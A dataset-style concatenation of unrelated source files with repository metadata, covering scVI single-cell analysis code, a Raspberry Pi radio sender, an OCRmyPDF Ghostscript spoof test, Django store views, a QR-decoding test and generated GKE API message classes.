scvi_latent_df.index = list(adata.obs_names)
if outdir:
os.makedirs(outdir, exist_ok=True)
scale_df.to_csv(
os.path.join(outdir, "SCVI_scale_df_{}.tsv".format(suffix)),
sep="\t",
index=True,
header=True,
)
scvi_latent_df.to_csv(
os.path.join(outdir, "SCVI_latent_df_{}.tsv".format(suffix)),
sep="\t",
index=True,
header=True,
)
adata.obsm["X_scvi"] = scvi_latent
for gene, gene_scale in zip(adata.var.index, np.squeeze(scale).T):
adata.obs["scale_" + gene] = gene_scale
sc.pp.neighbors(adata, use_rep="X_scvi", n_neighbors=20, n_pcs=30)
sc.tl.umap(adata, min_dist=0.3)
sc.tl.leiden(adata, key_added="X_scvi", resolution=0.8)
X_umap = adata.obsm["X_umap"]
X_umap_df = pd.DataFrame(X_umap)
X_umap_df.index = list(adata.obs_names)
if outdir:
X_umap_df.to_csv(
os.path.join(outdir, "SCVI_Xumap_df_{}.tsv".format(suffix)),
sep="\t",
index=True,
header=True,
)
scviDataset = AnnDatasetFromAnnData(adata)
if isinstance(hvg_genes, int):
scviDataset.subsample_genes(hvg_genes)
if isinstance(scviDataset.X, np.ndarray):
X = scviDataset.X
else:
X = scviDataset.X.toarray()
try:
X = torch.from_numpy(X).float().to(torch.cuda.current_device())
batch = torch.from_numpy(scviDataset.batch_indices.astype(float)).to(
torch.cuda.current_device()
)
except:
X = torch.from_numpy(X).float()
batch = torch.from_numpy(scviDataset.batch_indices.astype(float))
inference = scvi_vae.inference(X, batch)
# torch.cuda.empty_cache()
if reconstruction_loss == "nb":
reconst_loss = log_nb_positive(
X,
inference["px_rate"],
inference["px_r"],
inference["px_dropout"],
)
elif reconstruction_loss == "zinb":
reconst_loss = log_zinb_positive(
X,
inference["px_rate"],
inference["px_r"],
inference["px_dropout"],
)
gene_loss = np.nansum(reconst_loss.detach().cpu().numpy(), axis=0)
cell_loss = np.nansum(reconst_loss.detach().cpu().numpy(), axis=1)
gene_mean = np.array(adata[:, scviDataset.gene_names].X.mean(0))[0]
if not gene_mean.shape:
# TODO: need to handle this more gracefully
gene_mean = np.array(adata[:, scviDataset.gene_names].X.mean(0))
cell_mean = np.array(adata[:, scviDataset.gene_names].X.mean(1)).flatten()
fig1 = plt.figure(figsize=figsize)
ax = fig1.add_subplot(121)
ax.scatter(
gene_mean, gene_loss, label="Gene", alpha=0.5, color="black", s=point_size
)
gene_loss_df = pd.DataFrame([gene_mean, gene_loss])
gene_loss_df = gene_loss_df.T
gene_loss_df.index = list(scviDataset.gene_names)
gene_loss_df.columns = ["gene_mean", "gene_loss"]
cell_loss_df = pd.DataFrame([cell_mean, cell_loss])
cell_loss_df = cell_loss_df.T
cell_loss_df.index = list(adata.obs_names)
cell_loss_df.columns = ["cell_mean", "cell_loss"]
if outdir:
gene_loss_df.to_csv(
os.path.join(outdir, "SCVI_geneloss_df_{}.tsv".format(suffix)),
sep="\t",
index=True,
header=True,
)
cell_loss_df.to_csv(
os.path.join(outdir, "SCVI_cellloss_df_{}.tsv".format(suffix)),
sep="\t",
index=True,
header=True,
)
ax.set_xlabel("Mean counts")
    ax.set_ylabel("Reconstruction loss")
ax.legend(scatterpoints=1)
ax = fig1.add_subplot(122)
sc.pl.umap(
adata,
color="named_clusters",
show=False,
legend_fontweight=legend_fontweight,
ax=ax,
size=point_size,
legend_loc=legend_loc,
)
title = "{} | Genewise | disp:{} | loss:{} | ldvae:{}({}) | n_enc:{} | c_ofst:{} | g_ofst:{}".format(
title_prefix,
dispersion,
reconstruction_loss,
ldvae,
ldvae_bias,
n_encoder,
cell_offset,
gene_offset,
)
fig1.suptitle(title)
fig1.tight_layout(rect=[0, 0.03, 1, 0.95])
title = title.replace(" ", "").replace("=", "_")
if outdir:
os.makedirs(outdir, exist_ok=True)
fig1.savefig(os.path.join(outdir, "{}.pdf".format(title)))
fig1.savefig(os.path.join(outdir, "{}.png".format(title)))
fig2 = plt.figure(figsize=figsize)
ax = fig2.add_subplot(121)
ax.scatter(cell_mean, cell_loss, label="Cell", alpha=0.5, s=point_size)
ax.set_xlabel("Mean counts")
    ax.set_ylabel("Reconstruction loss")
ax.legend(scatterpoints=1)
ax = fig2.add_subplot(122)
sc.pl.umap(
adata,
color="named_clusters",
show=False,
ax=ax,
legend_loc=legend_loc,
legend_fontweight=legend_fontweight,
size=point_size,
)
title = "{} | Cellwise | disp:{} | loss:{} | ldvae:{}({}) | n_enc:{} | c_ofst:{} | g_ofst:{}".format(
title_prefix,
dispersion,
reconstruction_loss,
ldvae,
ldvae_bias,
n_encoder,
cell_offset,
gene_offset,
)
fig2.suptitle(title)
fig2.tight_layout(rect=[0, 0.03, 1, 0.95])
title = title.replace(" ", "").replace("=", "_")
if outdir:
fig2.savefig(os.path.join(outdir, "{}.pdf".format(title)))
fig2.savefig(os.path.join(outdir, "{}.png".format(title)))
if outdir:
model_name = "{} | Posterior | disp:{} | loss:{} | ldvae:{}({}) | n_enc:{} | c_ofst:{} | g_ofst:{}".format(
title_prefix,
dispersion,
reconstruction_loss,
ldvae,
ldvae_bias,
n_encoder,
cell_offset,
gene_offset,
)
# scVI explicitly asks this path to be empty
shutil.rmtree(
os.path.join(outdir, model_name.replace(" ", "") + ".posterior"),
ignore_errors=True,
)
scvi_posterior.save_posterior(
os.path.join(outdir, model_name.replace(" ", "") + ".posterior")
)
if sct_cell_pars is None:
fig1.show()
fig2.show()
obj_to_return = (
scvi_posterior,
scvi_latent,
scvi_vae,
scvi_trainer,
fig1,
fig2,
None,
)
titles_to_return = (
"posterior",
"latent",
"vae",
"trainer",
"cellwise_plot",
"genewise_plot",
"libsize_plot",
)
return dict(zip(titles_to_return, obj_to_return))
title = "{} | Libsize | disp:{} | loss:{} | ldvae:{}({}) | n_enc:{} | c_ofst:{} | g_ofst:{}".format(
title_prefix,
dispersion,
reconstruction_loss,
ldvae,
ldvae_bias,
n_encoder,
cell_offset,
gene_offset,
)
library_sizes = pd.DataFrame(scvi_posterior.get_stats())
sct_library_sizes = pd.read_csv(sct_cell_pars, sep="\t")
library_sizes.index = adata.obs_names
library_sizes.columns = ["scvi_libsize"]
library_sizes["scvi_loglibsize"] = np.log10(library_sizes["scvi_libsize"])
library_size_df = library_sizes.join(sct_library_sizes)
fig3 = plt.figure(figsize=(10, 5))
ax = fig3.add_subplot(121)
ax.scatter(
library_size_df["log_umi"],
library_size_df["scvi_libsize"],
alpha=0.5,
s=point_size,
)
ax.set_xlabel("log_umi")
ax.set_ylabel("scvi_libsize")
ax = fig3.add_subplot(122)
sc.pl.umap(
adata,
color="named_clusters",
show=False,
ax=ax,
legend_fontweight=legend_fontweight,
legend_loc=legend_loc,
size=point_size,
)
fig3.suptitle(title)
fig3.tight_layout(rect=[0, 0.03, 1, 0.95])
title = title.replace(" ", "").replace("=", "_")
if outdir:
fig3.savefig(os.path.join(outdir, "{}.pdf".format(title)))
fig3.savefig(os.path.join(outdir, "{}.png".format(title)))
fig1.show()
fig2.show()
fig3.show()
means_df = []
dropout_df = []
dispersion_df = []
for tensors in scvi_posterior.sequential(batch_size=batch_size):
sample_batch, _, _, batch_index, labels = tensors
outputs = scvi_posterior.model.inference(
sample_batch, batch_index=batch_index, y=labels
)
px_r = outputs["px_r"].detach().cpu().numpy()
px_rate = outputs["px_rate"].detach().cpu().numpy()
px_dropout = outputs["px_dropout"].detach().cpu().numpy()
dropout_df.append(px_dropout)
dispersion_df.append(px_r)
means_df.append(px_rate)
dropout_df = pd.DataFrame(np.vstack(dropout_df))
dispersion_df = pd.DataFrame(np.vstack(dispersion_df))
means_df = pd.DataFrame(np.vstack(means_df))
means_df.index = list(adata.obs_names)
means_df.columns = list(scviDataset.gene_names)
means_df = means_df.T
dropout_df.index = list(adata.obs_names)
dropout_df.columns = list(scviDataset.gene_names)
dropout_df = dropout_df.T
dispersion_df.index = list(adata.obs_names)
dispersion_df.columns = list(scviDataset.gene_names)
dispersion_df = dispersion_df.T
reconst_loss_df = pd.DataFrame(reconst_loss.detach().cpu().numpy())
reconst_loss_df.index = list(adata.obs_names)
reconst_loss_df.columns = list(scviDataset.gene_names)
reconst_loss_df = reconst_loss_df.T
if outdir:
os.makedirs(outdir, exist_ok=True)
means_df.to_csv(
os.path.join(outdir, "SCVI_means_df_{}.tsv".format(suffix)),
sep="\t",
index=True,
header=True,
)
dropout_df.to_csv(
os.path.join(outdir, "SCVI_dropout_df_{}.tsv".format(suffix)),
sep="\t",
index=True,
header=True,
)
dispersion_df.to_csv(
os.path.join(outdir, "SCVI_dispersions_df_{}.tsv".format(suffix)),
sep="\t",
index=True,
header=True,
)
reconst_loss_df.to_csv(
os.path.join(outdir, "SCVI_reconstloss_df_{}.tsv".format(suffix)),
sep="\t",
index=True,
header=True,
)
obj_to_return = (
scvi_posterior,
scvi_latent,
scvi_vae,
scvi_trainer,
fig1,
fig2,
fig3,
)
titles_to_return = (
"posterior",
"latent",
"vae",
"trainer",
"cellwise_plot",
"genewise_plot",
"libsize_plot",
)
sct_gene_pars_df = pd.read_csv(sct_gene_pars, sep="\t", index_col=0)
gene_cell_disp_summary_df = pd.DataFrame(
dispersion_df.median(1), columns=["gene_cell_mean_disp"]
)
merged_df = sct_gene_pars_df.join(gene_cell_disp_summary_df).dropna()
fig = plt.figure(figsize=(8, 4))
ax = fig.add_subplot(121)
ax.scatter(
merged_df["gmean"], merged_df["gene_cell_mean_disp"], alpha=0.5, label="Gene"
)
ax.legend(frameon=False)
ax.set_xlabel("Gene gmean")
ax.set_ylabel("SCVI theta")
merged_df = sct_gene_pars_df.join(sct_model_pars_fit_df)
ax = fig.add_subplot(122)
ax.scatter(merged_df["gmean"], merged_df["theta"], alpha=0.5, label="Gene")
ax.legend(frameon=False) # , loc='upper left')
ax.set_xlabel("Gene gmean")
ax.set_ylabel("SCT theta")
title = "{} | ThetaVSGmean | disp:{} | loss:{} | ldvae:{}({}) | n_enc:{} | c_ofst:{} | g_ofst:{}".format(
title_prefix,
dispersion,
reconstruction_loss,
ldvae,
ldvae_bias,
n_encoder,
cell_offset,
gene_offset,
)
fig.suptitle(title)
fig.tight_layout()
title = title.replace(" ", "")
if outdir:
fig.savefig(os.path.join(outdir, "{}.pdf".format(title)))
fig.savefig(os.path.join(outdir, "{}.png".format(title)))
sct_library_sizes = pd.read_csv(sct_cell_pars, sep="\t")
mean_scvi_disp_df = pd.DataFrame(dispersion_df.mean(1), columns=["scvi_dispersion"])
sct_disp_df = pd.read_csv(
sct_cell_pars.replace("_cell_", "_model_"), sep="\t", index_col=0
)
joined_df = sct_disp_df.join(mean_scvi_disp_df)
title = "{} | Dispersion | disp:{} | loss:{} | ldvae:{}({}) | n_enc:{} | c_ofst:{} | g_ofst:{}".format(
title_prefix,
dispersion,
reconstruction_loss,
ldvae,
ldvae_bias,
n_encoder,
cell_offset,
gene_offset,
)
fig4 = plt.figure(figsize=(10, 5))
ax = fig4.add_subplot(121)
ax.scatter(joined_df["theta"], joined_df["scvi_dispersion"], alpha=0.5)
ax.axline([0, 0], [1, 1], color="gray", linestyle="dashed")
ax.set_xlabel("SCT theta")
ax.set_ylabel("scVI theta")
ax = fig4.add_subplot(122)
sc.pl.umap(
adata,
color="named_clusters",
show=False,
ax=ax,
legend_fontweight=legend_fontweight,
legend_loc=legend_loc,
size=point_size,
)
fig4.suptitle(title)
fig4.tight_layout(rect=[0, 0.03, 1, 0.95])
title = title.replace(" ", "").replace("=", "_")
if outdir:
fig4.savefig(os.path.join(outdir, "{}.pdf".format(title)))
fig4.savefig(os.path.join(outdir, "{}.png".format(title)))
return dict(zip(titles_to_return, obj_to_return))
def RunSCVI(
counts_dir,
metadata_file,
sct_cell_pars,
outdir,
title_prefix="",
idents_col="phenoid",
reconstruction_loss="nb",
dispersion="gene-cell",
cell_offset="none",
gene_offset="none",
n_encoder=1,
hvg_genes=3000,
ldvae=False,
ldvae_bias=False,
use_cuda=True,
genes_to_exclude_file=None,
lr=1e-3,
kl_type="reverse",
**kwargs,
):
adata = sc.read_10x_mtx(counts_dir)
metadata = pd.read_csv(metadata_file, sep="\t", index_col=0)
adata.obs["named_clusters"] = metadata[idents_col]
n_epochs = np.min([round((20000 / adata.n_obs) * 400), 400])
sct_model_pars_fit = sct_cell_pars.replace("cell_pars", "model_pars_fit")
sct_gene_pars = sct_cell_pars.replace("cell_pars", "gene_attrs")
if genes_to_exclude_file:
genes_to_exclude_df = pd.read_csv(genes_to_exclude_file, sep="\t", index_col=0)
genes_to_exclude = genes_to_exclude_df.index.tolist()
all_genes = adata.var_names
genes_to_keep = list(set(all_genes).difference(genes_to_exclude))
adata = adata[:, genes_to_keep]
results = RunVAE(
adata,
reconstruction_loss,
linear=ldvae,
title_prefix=title_prefix,
n_encoder=n_encoder,
cell_offset=cell_offset,
gene_offset=gene_offset,
hvg_genes=hvg_genes,
n_epochs=n_epochs,
lr=lr,
dispersion=dispersion,
use_cuda=use_cuda,
sct_cell_pars=sct_cell_pars,
sct_gene_pars=sct_gene_pars,
sct_model_pars_fit=sct_model_pars_fit,
outdir=outdir,
kl_type=kl_type,
**kwargs,
)
return results
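# Example call (sketch; file names, the idents column and the SCTransform export
# paths are hypothetical and depend on how the upstream data was written out):
#   results = RunSCVI(
#       counts_dir="filtered_feature_bc_matrix/",
#       metadata_file="metadata.tsv",
#       sct_cell_pars="sct_cell_pars.tsv",
#       outdir="scvi_output/",
#       reconstruction_loss="nb",
#       dispersion="gene-cell",
#   )
#   scvi_latent = results["latent"]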
|
[
"[email protected]"
] | |
f5901347ae2393fbd28a0397052a34725ea59268
|
a1333f0e6b594eda043922363734b0e9e7e65b0e
|
/Pi sender/sender.py
|
affb768b4876f887e32a097da8ba6ad0f6c1c4ab
|
[] |
no_license
|
Kartikkh/Communication-between-Rpi-and-arduino-
|
65cb1b50871b73c8fc33c7f8b9bb4c287db09d22
|
0e961b2ba408bf1171dc3ff798f255ab99d444b2
|
refs/heads/master
| 2021-01-19T14:53:37.537722 | 2017-04-13T19:01:47 | 2017-04-13T19:01:47 | 88,194,870 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,122 |
py
|
import RPi.GPIO as GPIO
from lib_nrf24 import NRF24
import time
import spidev
GPIO.setmode(GPIO.BCM)
pipes = [[0xE8 , 0xE8 , 0xF0 , 0xF0 , 0xE1] , [0xF0 ,0xF0, 0xF0, 0xF0, 0xE1]]
radio = NRF24(GPIO,spidev.SpiDev())
radio.begin(0,17)
radio.setPayloadSize(32)
radio.setChannel(0x76)
radio.setDataRate(NRF24.BR_1MBPS)
radio.setPALevel(NRF24.PA_MIN)
radio.setAutoAck(True)
radio.enableDynamicPayloads()
radio.enableAckPayload()
radio.openWritingPipe(pipes[0])
radio.openReadingPipe(1,pipes[1])
radio.printDetails()
message = "11"
while True:
start = time.time();
radio.write(message)
print("Sent message: {}".format(message))
radio.startListening()
while not radio.available(0):
time.sleep(1/100)
if time.time() - start > 2:
print("timeOut")
break
    receivedMessage = []
    radio.read(receivedMessage, radio.getDynamicPayloadSize())
    print("Received: {}".format(receivedMessage))
    print("Translating string")
    string = ''
    # convert the received byte values into a printable string
    for byte in receivedMessage:
        if 32 <= byte <= 126:
            string += chr(byte)
    print("Our received message: {}".format(string))
radio.stopListening()
time.sleep(2)
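# Note: this sender assumes a matching receiver (e.g. an Arduino with an nRF24L01)
# listening on the same channel (0x76) and data rate, with the pipe addresses reversed.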
|
[
"khandelwal.kartik4gmail.comkhandelwal.kartik4gmail.com"
] |
khandelwal.kartik4gmail.comkhandelwal.kartik4gmail.com
|
8e4033741ac16a69170a9bfaf0ba7158c207ddc2
|
d0cf8b68b68e33900544dc056566511428692b71
|
/tests/spoof/gs_feature_elision.py
|
c2aabeb4d4d1e9b78fab46632764e38d376bfe25
|
[
"MIT"
] |
permissive
|
ryanfb/OCRmyPDF
|
3f1547c164d3b74b5e6c003bb875e50c292b36a4
|
f6a4d8f1f808a1c963c85e498a773ef0439db5ed
|
refs/heads/master
| 2021-01-21T04:25:00.603736 | 2017-08-27T20:53:36 | 2017-08-27T20:53:36 | 101,911,301 | 1 | 0 | null | 2017-08-30T17:44:15 | 2017-08-30T17:44:15 | null |
UTF-8
|
Python
| false | false | 800 |
py
|
#!/usr/bin/env python3
# © 2016 James R. Barlow: github.com/jbarlow83
import sys
import os
from subprocess import check_call
"""Replicate one type of Ghostscript feature elision warning during
PDF/A creation."""
def real_ghostscript(argv):
gs_args = ['gs'] + argv[1:]
os.execvp("gs", gs_args)
return # Not reachable
elision_warning = """GPL Ghostscript 9.20: Setting Overprint Mode to 1
not permitted in PDF/A-2, overprint mode not set"""
def main():
if '--version' in sys.argv:
print('9.20')
        print('SPOOFED: ' + os.path.basename(__file__))
sys.exit(0)
gs_args = ['gs'] + sys.argv[1:]
check_call(gs_args)
if '-sDEVICE=pdfwrite' in sys.argv[1:]:
print(elision_warning)
sys.exit(0)
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
c5a2686d19b0f3755d88a674ad24192b5c02286a
|
19a3c90ce8873d8f9fa7498b64597ee6fe5b767b
|
/simplemes/uwip/apps.py
|
1db1524788524f91f0e65aafa0dfc46f57aabdcf
|
[
"MIT"
] |
permissive
|
saulshao/simplemes
|
5eff2730b95c0de1c9a51e70d9ebf1ebab59ff2c
|
fb317570666f776231c1ffd48c6114b9697e47f1
|
refs/heads/master
| 2020-07-26T13:00:46.494089 | 2020-03-12T08:26:42 | 2020-03-12T08:26:42 | 208,651,563 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 83 |
py
|
from django.apps import AppConfig
class UwipConfig(AppConfig):
name = 'uwip'
|
[
"[email protected]"
] | |
a49e1855d4a2718fa0f9f0145c2892c9d810d1b8
|
6a8d994c73983de88a60ba8278ecb3f87ab98679
|
/BONJI_store/views.py
|
736d151984c759634778278d9ef5d1c5fef4550c
|
[] |
no_license
|
dberehovets/BONJI_store
|
5d12dd8c062c086b3b6ae1f6d53ce4458ecb3621
|
33701e028ed9b94a5604b663ba446a440e8e813d
|
refs/heads/master
| 2021-04-23T21:39:51.178910 | 2020-04-21T13:02:13 | 2020-04-21T13:02:13 | 250,011,659 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,241 |
py
|
from django.views.generic import TemplateView, ListView
from django.shortcuts import redirect, render
from django.http import HttpResponseRedirect
from django.core.paginator import Paginator
from accounts.forms import SubscriberForm
from accounts.models import Subscriber
from products.models import Product
from django.contrib import messages
from django.core.mail import send_mail
from random import shuffle
class HomePage(TemplateView):
template_name = 'index.html'
def post(self, request, *args, **kwargs):
form = SubscriberForm(request.POST)
if form.is_valid():
Subscriber.objects.get_or_create(**form.cleaned_data)
messages.add_message(request, messages.SUCCESS, "You are subscribed!")
return redirect('home')
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
products = list(Product.objects.all())
shuffle(products)
if len(products) >= 8:
products = products[:8]
context['products'] = products
return context
class ContactPage(TemplateView):
template_name = 'contact.html'
def post(self, request, *args, **kwargs):
# name = request.POST.get('name')
# last_name = request.POST.get('last_name')
# email = request.POST.get('email')
# subject = request.POST.get('subject') or "New message"
# message = name + " " + last_name + " wrote \n" + request.POST.get('message')
#
# send_mail(subject, message, email, ['[email protected]'])
messages.add_message(request, messages.SUCCESS, "Your email has been sent. Thank you!")
return redirect('contact')
def search(request):
if request.method == "POST":
req = request.POST.get('request')
if req == 'sale' or req == 'hot' or req == 'new':
products = Product.objects.filter(product_extra=req).order_by('-id')
else:
products = Product.objects.filter(name__contains=req).order_by('-id')
paginator = Paginator(products, 12)
return render(request, 'search_list.html', {'product_list': products, 'paginator': paginator})
return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
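# Hypothetical URL wiring for these views (the project's urls.py is not shown here):
#   path('', HomePage.as_view(), name='home'),
#   path('contact/', ContactPage.as_view(), name='contact'),
#   path('search/', search, name='search'),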
|
[
"[email protected]"
] | |
448a496d6cf183fe73cf62e90b39b8f5e925a6f8
|
cc1d44cf04e5b2b15bb296a434aad4ae4bcfc4be
|
/python3/qr/zbarlight_test.py
|
5944e63c9ba7fb774948ce49dce2fe4de1a416f1
|
[] |
no_license
|
ericosur/ericosur-snippet
|
dda2200546b13fb9b84632d115a0f4ca5e3d5c47
|
0309eeb614612f9a35843e2f45f4080ae03eaa81
|
refs/heads/main
| 2023-08-08T04:54:05.907435 | 2023-07-25T06:04:01 | 2023-07-25T06:04:01 | 23,057,196 | 2 | 1 | null | 2022-08-31T09:55:19 | 2014-08-18T03:18:52 |
Perl
|
UTF-8
|
Python
| false | false | 864 |
py
|
#!/usr/bin/env python3
# coding: utf-8
'''
apt-get install libzbar-dev
pip install zbarlight
I do not recommend using this module to decode qrcodes.
'''
import sys
from PIL import Image
import common
try:
import zbarlight
except ImportError:
    print('need to install zbarlight (python) and libzbar-dev')
sys.exit(1)
def read_image(fn):
''' read image '''
im = None
with open(fn, "rb") as fin:
im = Image.open(fin)
im.load()
return im
def process():
''' process '''
arr = common.get_pngs()
for fn in arr:
print('fn:', fn)
im = read_image(fn)
codes = zbarlight.scan_codes(['qrcode'], im)
        # codes is a list of bytes objects (or None if nothing was decoded)
for s in codes:
print(s)
print(s.decode('utf-8'))
def main():
''' main '''
process()
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
fa634099a27ded13c1952c58524029bb04dfce23
|
41986b7a1b95784f0a6256ae24d5942c70ced4d7
|
/prod/google-cloud-sdk/lib/googlecloudsdk/third_party/apis/container/v1alpha1/container_v1alpha1_messages.py
|
49c00a4745dfa8067e647185d258367759f8dcfb
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
wakabayashi-seiya/terraform_gcp
|
ed829a5a21d5d19d6663804ee5d5f7f3d23b4ec4
|
f757e56779f33c2fabd8a8eed9c51ff0b897a38f
|
refs/heads/master
| 2021-07-07T21:51:35.993317 | 2020-03-11T05:42:57 | 2020-03-11T05:42:57 | 239,411,772 | 0 | 1 | null | 2021-04-30T21:05:04 | 2020-02-10T02:32:04 |
Python
|
UTF-8
|
Python
| false | false | 175,511 |
py
|
"""Generated message classes for container version v1alpha1.
Builds and manages container-based applications, powered by the open source
Kubernetes technology.
"""
# NOTE: This file is autogenerated and should not be edited by hand.
from apitools.base.protorpclite import messages as _messages
from apitools.base.py import encoding
package = 'container'
class AcceleratorConfig(_messages.Message):
r"""AcceleratorConfig represents a Hardware Accelerator request.
Fields:
acceleratorCount: The number of the accelerator cards exposed to an
instance.
acceleratorType: The accelerator type resource name. List of supported
accelerators [here](/compute/docs/gpus)
"""
acceleratorCount = _messages.IntegerField(1)
acceleratorType = _messages.StringField(2)
class AddonsConfig(_messages.Message):
r"""Configuration for the addons that can be automatically spun up in the
cluster, enabling additional functionality.
Fields:
cloudBuildConfig: Configuration for the Cloud Build addon.
cloudRunConfig: Configuration for the Cloud Run addon. The `IstioConfig`
addon must be enabled in order to enable Cloud Run. This option can only
be enabled at cluster creation time.
configConnectorConfig: Configuration for the ConfigConnector add-on, a
Kubernetes extension to manage hosted GCP services through the
Kubernetes API
dnsCacheConfig: Configuration for NodeLocalDNS, a dns cache running on
cluster nodes
gcePersistentDiskCsiDriverConfig: Configuration for the GCP Compute
Persistent Disk CSI driver.
horizontalPodAutoscaling: Configuration for the horizontal pod autoscaling
feature, which increases or decreases the number of replica pods a
replication controller has based on the resource usage of the existing
pods.
httpLoadBalancing: Configuration for the HTTP (L7) load balancing
controller addon, which makes it easy to set up HTTP load balancers for
services in a cluster.
istioConfig: Configuration for Istio, an open platform to connect, manage,
and secure microservices.
kalmConfig: Configuration for the KALM addon, which manages the lifecycle
of k8s applications.
kubernetesDashboard: Configuration for the Kubernetes Dashboard. This
addon is deprecated, and will be disabled in 1.15. It is recommended to
use the Cloud Console to manage and monitor your Kubernetes clusters,
workloads and applications. For more information, see:
https://cloud.google.com/kubernetes-engine/docs/concepts/dashboards
networkPolicyConfig: Configuration for NetworkPolicy. This only tracks
whether the addon is enabled or not on the Master, it does not track
whether network policy is enabled for the nodes.
"""
cloudBuildConfig = _messages.MessageField('CloudBuildConfig', 1)
cloudRunConfig = _messages.MessageField('CloudRunConfig', 2)
configConnectorConfig = _messages.MessageField('ConfigConnectorConfig', 3)
dnsCacheConfig = _messages.MessageField('DnsCacheConfig', 4)
gcePersistentDiskCsiDriverConfig = _messages.MessageField('GcePersistentDiskCsiDriverConfig', 5)
horizontalPodAutoscaling = _messages.MessageField('HorizontalPodAutoscaling', 6)
httpLoadBalancing = _messages.MessageField('HttpLoadBalancing', 7)
istioConfig = _messages.MessageField('IstioConfig', 8)
kalmConfig = _messages.MessageField('KalmConfig', 9)
kubernetesDashboard = _messages.MessageField('KubernetesDashboard', 10)
networkPolicyConfig = _messages.MessageField('NetworkPolicyConfig', 11)
class AuthenticatorGroupsConfig(_messages.Message):
r"""Configuration for returning group information from authenticators.
Fields:
enabled: Whether this cluster should return group membership lookups
during authentication using a group of security groups.
securityGroup: The name of the security group-of-groups to be used. Only
relevant if enabled = true.
"""
enabled = _messages.BooleanField(1)
securityGroup = _messages.StringField(2)
class AutoUpgradeOptions(_messages.Message):
r"""AutoUpgradeOptions defines the set of options for the user to control
how the Auto Upgrades will proceed.
Fields:
autoUpgradeStartTime: [Output only] This field is set when upgrades are
about to commence with the approximate start time for the upgrades, in
[RFC3339](https://www.ietf.org/rfc/rfc3339.txt) text format.
description: [Output only] This field is set when upgrades are about to
commence with the description of the upgrade.
"""
autoUpgradeStartTime = _messages.StringField(1)
description = _messages.StringField(2)
class AutoprovisioningNodePoolDefaults(_messages.Message):
r"""AutoprovisioningNodePoolDefaults contains defaults for a node pool
created by NAP.
Fields:
management: Specifies the node management options for NAP created node-
pools.
minCpuPlatform: Minimum CPU platform to be used for NAP created node
pools. The instance may be scheduled on the specified or newer CPU
platform. Applicable values are the friendly names of CPU platforms,
such as <code>minCpuPlatform: "Intel Haswell"</code> or
<code>minCpuPlatform: "Intel Sandy Bridge"</code>. For more
information, read [how to specify min CPU
platform](https://cloud.google.com/compute/docs/instances/specify-min-
cpu-platform) To unset the min cpu platform field pass "automatic" as
field value.
oauthScopes: Scopes that are used by NAP when creating node pools. If
oauth_scopes are specified, service_account should be empty.
serviceAccount: The Google Cloud Platform Service Account to be used by
the node VMs. If service_account is specified, scopes should be empty.
upgradeSettings: Specifies the upgrade settings for NAP created node pools
"""
management = _messages.MessageField('NodeManagement', 1)
minCpuPlatform = _messages.StringField(2)
oauthScopes = _messages.StringField(3, repeated=True)
serviceAccount = _messages.StringField(4)
upgradeSettings = _messages.MessageField('UpgradeSettings', 5)
class AvailableVersion(_messages.Message):
r"""AvailableVersion is an additional Kubernetes versions offered to users
who subscribed to the release channel.
Fields:
reason: Reason for availability.
version: Kubernetes version.
"""
reason = _messages.StringField(1)
version = _messages.StringField(2)
class BigQueryDestination(_messages.Message):
r"""Parameters for using BigQuery as the destination of resource usage
export.
Fields:
datasetId: The ID of a BigQuery Dataset.
"""
datasetId = _messages.StringField(1)
class BinaryAuthorization(_messages.Message):
r"""Configuration for Binary Authorization.
Fields:
enabled: Enable Binary Authorization for this cluster. If enabled, all
container images will be validated by Google Binauthz.
"""
enabled = _messages.BooleanField(1)
class CancelOperationRequest(_messages.Message):
r"""CancelOperationRequest cancels a single operation.
Fields:
name: The name (project, location, operation id) of the operation to
cancel. Specified in the format 'projects/*/locations/*/operations/*'.
operationId: Deprecated. The server-assigned `name` of the operation. This
field has been deprecated and replaced by the name field.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the operation resides.
This field has been deprecated and replaced by the name field.
"""
name = _messages.StringField(1)
operationId = _messages.StringField(2)
projectId = _messages.StringField(3)
zone = _messages.StringField(4)
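# Illustrative only: the docstring above prefers the single 'name' field over
# the deprecated projectId/zone/operationId fields, so a hypothetical cancel
# request might look like:
#
#   req = CancelOperationRequest(
#       name='projects/my-project/locations/us-central1/operations/operation-123')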
class CidrBlock(_messages.Message):
r"""CidrBlock contains an optional name and one CIDR block.
Fields:
cidrBlock: cidr_block must be specified in CIDR notation.
displayName: display_name is an optional field for users to identify CIDR
blocks.
"""
cidrBlock = _messages.StringField(1)
displayName = _messages.StringField(2)
class ClientCertificateConfig(_messages.Message):
r"""Configuration for client certificates on the cluster.
Fields:
issueClientCertificate: Issue a client certificate.
"""
issueClientCertificate = _messages.BooleanField(1)
class CloudBuildConfig(_messages.Message):
r"""Configuration options for the Cloud Build addon.
Fields:
enabled: Whether the Cloud Build addon is enabled for this cluster.
"""
enabled = _messages.BooleanField(1)
class CloudNatStatus(_messages.Message):
r"""CloudNatStatus contains the desired state of the cloud nat functionality
on this cluster.
Fields:
enabled: Enables Cloud Nat on this cluster. On an update if
update.desired_cloud_nat_status.enabled = true, The API will check if
any Routers in the cluster's network has Cloud NAT enabled on the pod
range. a. If so, then the cluster nodes will be updated to not perform
SNAT. b. If no NAT configuration exists, a new Router with Cloud NAT
on the secondary range will be created first, and then the nodes
will be updated to no longer do SNAT.
"""
enabled = _messages.BooleanField(1)
class CloudRunConfig(_messages.Message):
r"""Configuration options for the Cloud Run feature.
Fields:
disabled: Whether Cloud Run is enabled for this cluster.
enableAlphaFeatures: Enable alpha features of Cloud Run. These features
are only available to trusted testers.
"""
disabled = _messages.BooleanField(1)
enableAlphaFeatures = _messages.BooleanField(2)
class Cluster(_messages.Message):
r"""A Google Kubernetes Engine cluster.
Enums:
NodeSchedulingStrategyValueValuesEnum: Defines behaviour of k8s scheduler.
StatusValueValuesEnum: [Output only] The current status of this cluster.
Messages:
ResourceLabelsValue: The resource labels for the cluster to use to
annotate any related GCE resources.
Fields:
